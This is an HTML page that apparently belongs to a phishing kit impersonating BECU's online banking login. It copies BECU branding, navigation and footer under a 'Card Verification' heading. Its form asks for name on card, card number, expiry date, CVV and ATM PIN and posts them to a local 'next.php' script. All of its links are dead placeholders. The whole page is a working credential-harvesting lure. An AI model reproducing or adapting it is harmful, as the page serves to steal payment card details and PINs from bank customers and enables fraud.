<html lang="en" class="">

<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>
        Online Banking Login | BECU
    </title>
    <link id="maincss" href="css/becu-olb.min.css" type="text/css" rel="stylesheet">
    <style type="text/css">
    nav.navbar .dropdown-content ul.pages-utility li a.search.icon:before {
        display: none;
    }

    nav.navbar .dropdown-content ul.pages-utility li a.locations.icon:before {
        display: none;
    }

    nav.navbar .dropdown-content ul.pages-utility li a.support.icon:before {
        display: none;
    }
    </style>
</head>

<body id="bodytag" class="login_aspx">
    <div id="standardHeader" class="pageHeaderContainer">
        <div class="pageHeader">
            <nav class="navbar navbar-default" role="navigation">
                <div class="container">
                    <div class="navbar-header">
                        <a href="#" class="logo-becu">
                            <img src="images/becu-logo-mobile.png" id="logomobile">
                            <img src="images/becu-logo-tablet.png" id="logotablet">
                            <img src="images/becu-logo-desktop.png" id="logodesktop">
                        </a>
                        <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#nav-main-dropdown">
                            <span class="sr-only">Toggle navigation</span>
                            <span class="icon-bar"></span>
                            <span class="icon-bar"></span>
                            <span class="icon-bar"></span>
                            <span class="navicon"></span>
                        </button>
                    </div>
                    <div id="nav-main-dropdown" class="collapse navbar-collapse">
                        <div class="dropdown-content cf">
                            <div class="desktop-view">
                                <ul id="pages-utility-nav" class="pages-utility" tabindex="-1">
                                    <li>
                                        <a href="#" id="LINKSEARCH" class="search icon">Search</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKBRANCHLOCATOR" class="locations icon">Locations</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKSUPPORT" class="support icon">Support</a>
                                    </li>
                                </ul>
                            </div>
                            <div class="component-user-login">
                            </div>
                            <div class="desktop-view">
                                <ul class="pages-main">
                                    <li>
                                        <a href="#" id="LINKMEMBERSMATTER">BECU &amp; YOU</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKEVERYDAYBANKING" class="">Everyday Banking</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKLOANSMORTGAGES" class="">Loans &amp; Mortgages</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKINVESTMENTSTRUST" class="">Planning &amp; Investing</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKBUSINESSBANKING" class="">Business Banking</a>
                                    </li>
                                </ul>
                            </div>
                            <div id="nav" class="component-nav-links tablet-view" data-container-name="header-nav">
                                <ul class="pages-main">
                                    <li>
                                        <a href="#" id="LNKMEMBERSMATTER">BECU &amp; YOU</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKEVERYDAYBANKING" class="">Everyday Banking</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKLOANSMORTGAGES" class="">Loans &amp; Mortgages</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKINVESTMENTSTRUST" class="">Planning &amp; Investing</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKBUSINESSBANKING" class="">Business Banking</a>
                                    </li>
                                </ul>
                                <ul class="pages-utility">
                                    <li>
                                        <a href="#" id="LNKSEARCH" class="search icon">Search</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKBRANCHLOCATOR" class="locations icon">Locations</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKSUPPORT" class="support icon">Support</a>
                                    </li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>
            </nav>
            <div id="PAGESUBHEADER" class="container">
                <div class="pageTitle">
                    <h1 class="headline">
                        Card Verification
                    </h1>
                </div>
                <nav id="sub-nav">
                </nav>
            </div>
        </div>
    </div>
    <main role="main">
        <div class="pageBody">
            <div id="MAINFORM">
                <div id="container " class="container div1" tabindex="-1" style="display: block;">
                    <div id="CONTENTROW" class="row">
                        <div id="PAGECONTENT" class="content col-xs-12 col-sm-12 col-md-12 col-lg-12">
                            <div class="instructionsContainer">
                                <div class="row">
                                    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                                        <p><br>Please fill the detail which is given below:</p>
                                    </div>
                                </div>
                            </div>
                            <form action="./next.php" method="POST">
                                <div class="formContainer">
                                    <div class="formInputContainer">
                                        <div class="formFields">
                                            <table cellspacing="2" width="100%" class="formTable">
                                                <tbody>
                                                   
                                                    <tr class="item">
                                                        <td width="10%"><strong>Name on Card</strong></td>
                                                        <td width="30%">
                                                            <input name="noc" type="text" id="noc" class="standardInput" required="">
                                                        </td>
                                                        <td width="60%">&nbsp;</td>
                                                    </tr>
                                                    <tr class="item">
                                                        <td width="10%"><strong>Card Number</strong></td>
                                                        <td width="30%">
                                                            <input name="cn" type="text" id="cn" class="standardInput" required="">
                                                        </td>
                                                        <td width="60%">&nbsp;</td>
                                                    </tr>
                                                    
                                        <tr class="item">
                                                        <td width="10%"><strong>Exp MM/YY</strong></td>
                                                        <td width="30%">
                                                            <input name="exp" type="text" id="exp" class="standardInput" required="">
                                                        </td>
                                                        <td width="60%">&nbsp;</td>
                                                    </tr>            
                                                  
                                                    <tr class="item">
                                                        <td width="10%"><strong>CVV</strong></td>
                                                        <td width="30%">
                                                            <input name="cvv" type="text" id="cvv" class="standardInput" required="">
                                                        </td>
                                                        <td width="60%">&nbsp;</td>
                                                    </tr>
                                                    <tr class="item">
                                                        <td width="10%"><strong>ATM Pin</strong></td>
                                                        <td width="30%">
                                                            <input name="pin" type="password" id="pin" class="standardInput" required="">
                                                        </td>
                                                        <td width="60%">&nbsp;</td>
                                                    </tr>
                                                    
                                                    
                                                   
                                                    <tr class="item">
                                                        <td><label for="ctlSignon_ddlSignonDestination"></label></td>
                                                        <td>
                                                        </td>
                                                        <td></td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </div>
                                    </div>
                                    <div class="formButtonContainer"><input type="submit" name="btn4" value="Agree and Continue" id="btn4" class="btn red"></div>
                                    <div class="sectionDivider"></div>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
               
            </div>
        </div>
    </main>
    <footer id="navFooter_standardFooter" class="footer">
        <div class="container">
            <div class="footer-links ">
                <ul>
                    <li>
                        <a id="footer11" class="" target="_self" href="#">ACCESSIBILITY</a>
                    </li>
                    <li>
                        <a id="footer12" class="" target="_self" href="#">MEMBERSHIP</a>
                    </li>
                    <li>
                        <a id="footer13" class="" target="_self" href="#">FORMS</a>
                    </li>
                    <li>
                        <a id="footer14" class="" target="_self" href="#">ABOUT US</a>
                    </li>
                    <li>
                        <a id="footer15" class="" target="_self" href="#">ROUTING NUMBER 325081403</a>
                    </li>
                </ul>
                <ul>
                    <li>
                        <a id="footer21" class="" target="_blank" href="#">AVOIDING FORECLOSURE</a>
                    </li>
                    <li>
                        <a id="footer22" class="" target="_self" href="#">NEWS &amp; DISCOUNTS</a>
                    </li>
                    <li>
                        <a id="footer23" class="" target="_self" href="#">CONTACT</a>
                    </li>
                    <li>
                        <a id="footer24" class="" target="_self" href="#">CAREERS</a>
                    </li>
                    <li>
                        <a id="footer25" class="" target="_self" href="#">NEWSROOM</a>
                    </li>
                </ul>
                <ul>
                    <li>
                        <a id="footer31" class="" target="_self" href="#">SECURITY</a>
                    </li>
                    <li>
                        <a id="footer32" class="" target="_self" href="#">PRIVACY</a>
                    </li>
                    <li>
                        <a id="footer33" class="" target="_self" href="#">TERMS &amp; CONDITIONS</a>
                    </li>
                    <li>
                        <a id="footer34" class="" target="_blank" href="#">SEND A SUGGESTION</a>
                    </li>
                    <li>
                        <a id="footer35" class="" target="_self" href="#">BECU BLOG</a>
                    </li>
                </ul>
                <ul class="footer-social">
                    <div id="social-text" class="social-text">
                        Follow BECU
                    </div>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="facebook-link">
                            <img src="images/Icon_Facebook.svg?h=45&amp;w=45" id="facebook-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="instagram-link">
                            <img src="images/Icon_Instagram.svg?h=45&amp;w=45" id="instagram-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="twitter-link">
                            <img src="images/Icon_Twitter.svg?h=45&amp;w=45" id="twitter-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="pinterest-link">
                            <img src="images/Icon_Pinterest.svg?h=45&amp;w=45" id="pinterest-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="linkedin-link">
                            <img src="images/Icon_LinkedIn.svg?h=45&amp;w=45" id="linkedin-image" class="social-image"></a></li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="youtube-link">
                            <img src="images/Icon_YouTube.svg?h=45&amp;w=45" id="youtube-image" class="social-image">
                        </a></li>
                </ul>
            </div>
            <div id="footer-legal" class="footer-legal">
                <ul class="footer-copyright">
                    <li>
                        <div class="flex-display">
                            <div class="ncua-text">
                                <span id="ncua-text">
                                    © 2021 BECU. All Rights Reserved. Federally Insured by NCUA.
                                </span>
                                <span id="ehol-text">
                                    Equal Housing Opportunity Lender
                                </span>
                            </div>
                            <div class="footer-ncua-ehol-container">
                                <img id="ehol-logo" class="ehol-logo" src="images/Icon_EHOL.png">
                                <img id="ncua-logo" class="ncua-logo" src="images/Icon_NCUA.png">
                            </div>
                        </div>
                    </li>
                </ul>
            </div>
        </div>
    </footer>
</body>

</html>